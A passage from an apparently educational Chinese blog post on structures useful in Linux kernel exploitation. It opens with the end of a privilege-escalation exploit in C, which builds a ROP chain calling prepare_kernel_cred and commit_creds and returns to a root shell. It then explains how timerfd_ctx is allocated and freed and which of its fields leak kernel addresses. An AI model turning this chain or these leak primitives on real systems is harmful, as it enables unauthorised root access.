printf("[+] kernel base: %p\n", kernel_offset);

commit_creds += kernel_offset;
pop_rdi_ret += kernel_offset;
swapgs_restore_regs_and_return_to_usermode += kernel_offset;
prepare_kernel_cred += kernel_offset;
mov_rdi_rax_rep_ret += kernel_offset;
pop_rcx_ret += kernel_offset;
xchg_esp_eax_ret += kernel_offset;

size_t *rop = (void *) (xchg_esp_eax_ret & 0xFFFFFFFF);
mmap((void *) rop - 0x3000, 0x6000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
*rop++ = pop_rdi_ret;
*rop++ = 0;
*rop++ = prepare_kernel_cred;
*rop++ = pop_rcx_ret;
*rop++ = 0;
*rop++ = mov_rdi_rax_rep_ret;
*rop++ = commit_creds;
*rop++ = swapgs_restore_regs_and_return_to_usermode + 0x16;
rop++;
rop++;
*rop++ = (size_t) get_shell;
*rop++ = user_cs;
*rop++ = user_rflags;
*rop++ = user_sp;
*rop++ = user_ss;
pthread_t t;
pthread_create(&t, NULL, edit_subprocess_info, NULL);
while (!success) {
usleep(1);
socket(22, AF_INET, 0);
}

return 0;
}

timerfd_ctx 与 timerfd 系列系统调用

自 2.6.25 版本起 Linux 提供了一种可以用以创建定时器的系统调用——timerfd 系列系统调用,相比起定时器的功能,我们更加关注系统调用过程中涉及到的 timerfd_ctx 结构体

timerfd_ctx(kmalloc-256 | GPF_KERNEL)

该结构体定义于 fs/timerfd.c 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
struct timerfd_ctx {
union {
struct hrtimer tmr;
struct alarm alarm;
} t;
ktime_t tintv;
ktime_t moffs;
wait_queue_head_t wqh;
u64 ticks;
int clockid;
short unsigned expired;
short unsigned settime_flags; /* to show in fdinfo */
struct rcu_head rcu;
struct list_head clist;
spinlock_t cancel_lock;
bool might_cancel;
};

其中的 hrtimer 结构体定义于 /include/linux/hrtimer.h 中,如下:

1
2
3
4
5
6
7
8
9
10
struct hrtimer {
struct timerqueue_node node;
ktime_t _softexpires;
enum hrtimer_restart (*function)(struct hrtimer *);
struct hrtimer_clock_base *base;
u8 state;
u8 is_rel;
u8 is_soft;
u8 is_hard;
};

分配/释放

我们可以通过 timerfd_create 系统调用来分配一个 timerfd_ctx 结构体,在 fs/timerfd.c 中有如下定义:

1
2
3
4
5
6
7
8
9
10
11
SYSCALL_DEFINE2(timerfd_create, int, clockid, int, flags)
{
int ufd;
struct timerfd_ctx *ctx;

//...

ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);

//...
}

同样地,对于 timerfd 文件在 fs/timerfd.c 中定义了其函数表 timerfd_ops,如下:

1
2
3
4
5
6
7
8
static const struct file_operations timerfd_fops = {
.release = timerfd_release,
.poll = timerfd_poll,
.read = timerfd_read,
.llseek = noop_llseek,
.show_fdinfo = timerfd_show,
.unlocked_ioctl = timerfd_ioctl,
};

其中 timerfd_release 定义于 fs/timerfd.c 中,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
static int timerfd_release(struct inode *inode, struct file *file)
{
struct timerfd_ctx *ctx = file->private_data;

timerfd_remove_cancel(ctx);

if (isalarm(ctx))
alarm_cancel(&ctx->t.alarm);
else
hrtimer_cancel(&ctx->t.tmr);
kfree_rcu(ctx, rcu);
return 0;
}

即我们可以通过关闭 timerfd 文件来释放 timerfd_ctx 结构体。

数据泄露

  • 内核 .text 段地址

    timerfd_ctx 的 tmr 字段的 function 字段指向内核代码段,若能泄漏出该指针则我们便毫无疑问能泄漏出内核基址。

  • 内核线性映射区( direct mapping area)

    timerfd_ctx 的 tmr 字段的 base 字段指向内核“堆”上,若能泄露该字段我们同样能泄漏出内核的“堆上地址”。

  • Title: linux kernel pwn 常用结构体
  • Author: sky123
  • Created at : 2024-11-08 20:33:04
  • Updated at : 2024-11-20 03:33:25
  • Link: https://skyi23.github.io/2024/11/08/linux-kernel-pwn-useful-structs/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
linux kernel pwn 常用结构体